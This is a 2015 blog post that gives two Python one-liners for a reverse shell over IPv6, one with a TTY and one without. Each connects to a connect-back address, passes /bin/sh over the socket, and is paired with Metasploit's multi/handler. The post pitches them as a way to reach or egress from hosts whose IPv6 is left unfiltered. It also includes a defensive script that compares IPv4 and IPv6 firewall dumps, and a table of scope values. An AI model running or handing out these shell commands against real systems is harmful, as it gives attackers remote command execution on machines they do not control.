Sunday, February 22, 2015

Python TTY Reverse Shell Over IPv6 One-Liner

Most newer systems come with IPv6 enabled by default, yet many folks continue to forget or are unsure of how to secure IPv6. An admin may create strict rule sets for IPv4, but may neglect to create any for IPv6. This could then be an attack vector to gain access to a system or a method to egress out.
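The gap described above can be checked by comparing `iptables-save` and `ip6tables-save` output. The following is an added example, not code from the original post; the two dumps are constructed samples, and the function names `parse_save` and `ipv6_gaps` are hypothetical. It reports built-in chains that are filtered for IPv4 but have an ACCEPT policy and no rules for IPv6.

```python
import re

# Constructed sample dumps in iptables-save / ip6tables-save format (not from the post).
SAMPLE_V4 = """\
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT DROP [0:0]
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
-A OUTPUT -p tcp -m tcp --dport 443 -j ACCEPT
COMMIT
"""
SAMPLE_V6 = """\
*filter
:INPUT DROP [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
COMMIT
"""

def parse_save(dump):
    """Return {(table, chain): {"policy": str, "rules": int}} for built-in chains."""
    chains, table = {}, None
    for line in map(str.strip, dump.splitlines()):
        if line.startswith("*"):            # "*filter" opens a table section
            table = line[1:]
        elif m := re.match(r":(\S+) (\S+) ", line):
            if m.group(2) != "-":           # user-defined chains have policy "-"
                chains[(table, m.group(1))] = {"policy": m.group(2), "rules": 0}
        elif (m := re.match(r"-A (\S+) ", line)) and (table, m.group(1)) in chains:
            chains[(table, m.group(1))]["rules"] += 1
    return chains

def ipv6_gaps(v4_dump, v6_dump):
    """Chains that are filtered for IPv4 but left wide open for IPv6."""
    v4, v6 = parse_save(v4_dump), parse_save(v6_dump)
    gaps = []
    for (table, chain), c4 in sorted(v4.items()):
        c6 = v6.get((table, chain), {"policy": "ACCEPT", "rules": 0})
        strict4 = c4["policy"] != "ACCEPT" or c4["rules"] > 0
        open6 = c6["policy"] == "ACCEPT" and c6["rules"] == 0
        if strict4 and open6:
            gaps.append(f"{table}/{chain}")
    return gaps

if __name__ == "__main__":
    print("\n".join(f"IPv4 filtered, IPv6 open: {c}" for c in ipv6_gaps(SAMPLE_V4, SAMPLE_V6)))
```

On a live host the two arguments would be the captured output of `iptables-save` and `ip6tables-save`; an open `filter/OUTPUT` chain for IPv6 is the egress case the paragraph describes.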

If you find yourself needing to gain a reverse shell with a TTY over IPv6, here is a Python one-liner that you can use. This will work with Metasploit's "exploit/multi/handler" module with the "linux/x86/shell/reverse_ipv6_tcp" payload.

There are a few key aspects about connecting over IPv6 with this method that you should also be aware of. You must specify what interface you want to use (even if there is only one) and you must specify the IPv6 Scope Value. The IPv6 Scope Value specifies what type of address you are connecting to. In the example below, we have an IPv6 address that starts with "fe80", which is a link-local address. In this case, the Scope Value would be "2".

Legend:
    fe80::ccc:2999:ffff:aaaa = Your IPv6 Connect Back Address
    eth0 = The system's network interface to use
    2222 = Port number
    2 = IPv6 Scope Value


$ python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("fe80::ccc:2999:ffff:aaaa%eth0",2222,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'


If for some reason you wanted a reverse shell without a TTY:

$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("fe80::ccc:2999:ffff:aaaa%eth0",2222,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'



IPv6 Scope values

| Value | Scope name | Notes |
|-------|------------|-------|
| 0x0 | reserved | |
| 0x1 | interface-local | Interface-local scope spans only a single interface on a node, and is useful only for loopback transmission of multicast. |
| 0x2 | link-local | Link-local and site-local multicast scopes span the same topological regions as the corresponding unicast scopes. |
| 0x4 | admin-local | Admin-local scope is the smallest scope that must be administratively configured, i.e., not automatically derived from physical connectivity or other, non-multicast-related configuration. |
| 0x5 | site-local | Link-local and site-local multicast scopes span the same topological regions as the corresponding unicast scopes. |
| 0x8 | organization-local | Organization-local scope is intended to span multiple sites belonging to a single organization. |
| 0xe | global | |
| 0xf | reserved | |